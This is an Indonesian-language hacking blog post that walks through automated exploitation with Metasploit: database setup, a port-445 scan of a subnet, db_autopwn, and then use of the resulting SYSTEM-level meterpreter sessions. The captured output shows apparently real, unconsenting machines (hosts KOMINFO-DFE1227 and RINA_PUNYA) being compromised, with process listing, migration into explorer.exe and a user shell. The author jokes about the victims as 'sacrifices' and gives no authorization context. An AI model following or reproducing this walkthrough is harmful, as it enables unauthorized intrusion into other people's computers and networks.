Pasti kalo yang doyan hacking gak asing lagi sama kata yang satu ini, yup Metaspl0it.
Sekarang aku mau share exploitasi otomatis dengan metasploit, jadi biar metaspl0it yang cari target beserta exploitnya. enak dong? ia dong?
Ikutin langkah langkah di bawah :
Install dulu postgresql, cz disini kita bakal gunain db_driver postgresql di Metaspl0it .
ichamedusa@359imbox:~$ sudo apt-get install postgresql
ichamedusa@359imbox:~$ sudo apt-get install libpgsql-ruby
Setelah Postgresql terinstall, buat user dan database terlebih dahulu untuk dikoneksikan dengan Metaspl0it
ichamedusa@359imbox:~$ sudo su postgres
createuser namauser -P (-P untuk memberi password pada user)
ichamedusa@359imbox:/home/ichamedusa$ createuser ichamedusa -P
Enter password for new role: [masukkan password user]
Enter it again: [masukkan password user 1x lagi]
Shall the new role be a superuser? (y/n) Y
User udah jadi terus siapin databasenya buat Pentest
createdb --owner=user nama_database
Jalanin Postgersqlnya..
postgres@359imbox:/home/ichamedusa$/etc/init.d/postgresql-8.4 start
Oke semua persiapan uda beres, sekarang tinggal menyuruh si Metaspl0it nyari tumbal. akwkwkwkwkw
postgres@359imbox:/home/ichamedusa$sudo msfconsole
pake driver Postgresql, terus konekin ama database yang yang uda di buat tadi.
msf > db_driver postgresql
// db_connect user:password@localhost/nama_database
msf > db_connect scr3am:150787@127.0.0.1/msf_auto_pwn
Sekarang tinggal atur range IP yang bakal kita Exploitasi, kalo aku cari target dengan port 445 (buat mempersempit target pencarian aja)
cara scanning ini bisa bervariasi tergantung kreatifitas dan kebutuhan.
msf > db_nmap -p 445 172.17.12.0-100
[*] Nmap: Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-07 13:20 WIT
[*] Nmap: Nmap scan report for 172.17.12.13
[*] Nmap: Host is up (0.012s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: Nmap scan report for 172.17.12.16
[*] Nmap: Host is up (0.014s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: Nmap scan report for 172.17.12.18
[*] Nmap: Host is up (0.016s latency).
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: Nmap scan report for 172.17.12.39
[*] Nmap: Host is up (0.023s latency).
biarin jalan.
msf > db_autopwn -e -q -p
[*] (175/175 [2 sessions]): Waiting on 5 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 5 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 4 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 3 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 1 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 1 launched modules to finish execution...
[*] (175/175 [2 sessions]): Waiting on 0 launched modules to finish execution...
ok, uda selese.
msf > sleep 5
msf > jobs -K
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ KOMINFO-DFE1227 172.17.42.2:41031 -> 172.17.12.146:4793
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ RINA_PUNYA 172.17.42.1:55416 -> 172.17.12.70:10811
msf > session -i 1
[*] Starting interaction with 1...
dapet dua pemirsa..
meterpreter > sysinfo
System Language : en_US
OS : Windows XP (Build 2600, Service Pack 2).
Computer : KOMINFO-DFE1227
Architecture : x86
Meterpreter : x86/win32
wew, teernyata Windows XP SP 2 pemirsa, kita liat deh task nya..
1112 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1324 AvastSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\AVAST Software\Avast\AvastSvc.exe
1360 explorer.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\Explorer.EXE
1464 AvastUI.exe x86 0 KOMINFO-DFE1227\lina C:\Program Files\AVAST Software\Avast\avastUI.exe
1476 igfxtray.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\igfxtray.exe
1484 hkcmd.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\hkcmd.exe
1492 igfxpers.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\igfxpers.exe
1504 BJMYPRT.EXE x86 0 KOMINFO-DFE1227\lina C:\Program Files\Canon\MyPrinter\BJMyPrt.exe
1548 igfxsrvc.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\igfxsrvc.exe
1604 devices.exe x86 0 KOMINFO-DFE1227\lina C:\Program Files\Innovative Solutions\DriverMax\devices.exe
164 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
2200 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
2600 firefox.exe x86 0 KOMINFO-DFE1227\lina C:\Program Files\Mozilla Firefox\firefox.exe
3156 wscntfy.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\wscntfy.exe
3172 wuauclt.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\wuauclt.exe
3204 EXCEL.EXE x86 0 KOMINFO-DFE1227\lina C:\Program Files\Microsoft Office\Office12\EXCEL.EXE
Saatnya pindah ke explorer.exe dengan cara migrate PID.
meterpreter > migrate 1360
[*] Migrating to 1360...
[*] Migration completed successfully.
meterpreter > shell
Process 1932 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\lina>
kalo udah gini mau ngapain lagi hayooo?
No comments:
Post a Comment